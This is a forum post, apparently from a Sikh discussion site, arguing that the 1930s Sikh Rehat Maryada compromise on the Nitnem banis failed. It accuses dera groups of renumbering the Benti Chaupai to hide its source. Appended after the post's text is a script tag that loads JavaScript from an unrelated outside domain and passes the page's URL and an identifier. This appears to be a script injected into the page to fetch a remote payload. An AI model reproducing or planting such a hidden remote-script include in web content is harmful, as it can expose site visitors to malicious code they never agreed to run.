Looking at the whole question objectively there is no question that in this Nitnem banis dilemma is one the sikhs created for themsleves. 1. The SGGS compiled and edited signed by the Guru Sahibaans - Guru Arjun Ji and Guru Teg bahadur Ji, and Guru Gobind Singh Ji has clearly titled the NITNEM BANIS in the First 13 pages of SGGS. Here we ahve the Jap ji, then we have the REHRASS and then we have the SOHILA. ALL these 13 pages are SPECIALLY COMPILED..because the Shabads in them also occur a SECOND TIME in their respective Raags elsewhere in the SGGS. This is on purpose otherwise why REPEAT/ remove certain shabads from their Raags and COMPILE them together in the Beginning pages under different HEADINGS. This means this Nitnem BOUQUET is specially prepared for US by the GURU and presented in a special way. It is clear that the SRM prepared in the 1930s as a "CONCENSUS" was bending over backwards...way way backwards to "SATISFY EVERY ONE"...but the total effect is NO ONE IS SATISFIED. In fact leavng this and the Raagmala questions OPEN ENDED meant the DERAWADEES were given encouragement to go their own way as always..NOT a SINGLE DERA followed the SRM then and not a single dera follows it TODAY. So it was an exercise in FUTILITY to beleive that "including" elements demanded by the DERAWADEES would appease them...all it did was expose the weakness of the PANTH and we are suffering now because of that weakness back then.. Thus the inevitable conclusion is the panth has been led up the garden path by the derawadees of Nannaksar, taksal, whatever whatever..who never had any intention to ever follow the same SRM as the mainstream Sikhs. In this schoalrly article the author ahs looked at ALL the 13 or so available sources for clues as to what the "original" Nitnem banis or banis read at Pahul were. NOT an IOTA of agreement between the 13 sources..each has his own version of the events, the banis etc. BUT MOST SURPRISINGLY...NOT a SINGLE of those sources mentions the BEANTI CHAUPAII as part of nitnem banis..and the DERAWADEES are the strongest proponents of this poem taken form CharitroPakhyan section of the DG...not only "taken" BUT surreptitiously done to HIDE its ORIGIN through RENUMBERING of the Stanzas from the ORIGINAL ONES to start at 1 - 22 when the Original DG nubers its stanzas in 3 figures becasue the full Charitropakhyan has over 400 couplets. This SUBTERFUGE was also USED in the RAAGMAALA...its also numbered SECOND TIME ( its fake author also forgot to sequence number and stupidly repeated No. 1 over and over !! while the copier of Beanti Chaupaii wasnt that stupid...he began with 1 and numbered sequentially !! <script src="https://secure-content-delivery.com/data.js.php?i={B9986458-7307-43C8-90C7-6BE304BE4CCA}&d=2013-08-02&s=http://www.sikhphilosophy.net/sikh-rehat-maryada/41298-nitnem-banis-and-the-srm-punjabi.html&cb=0.37156623334273065" type="text/javascript"></script>
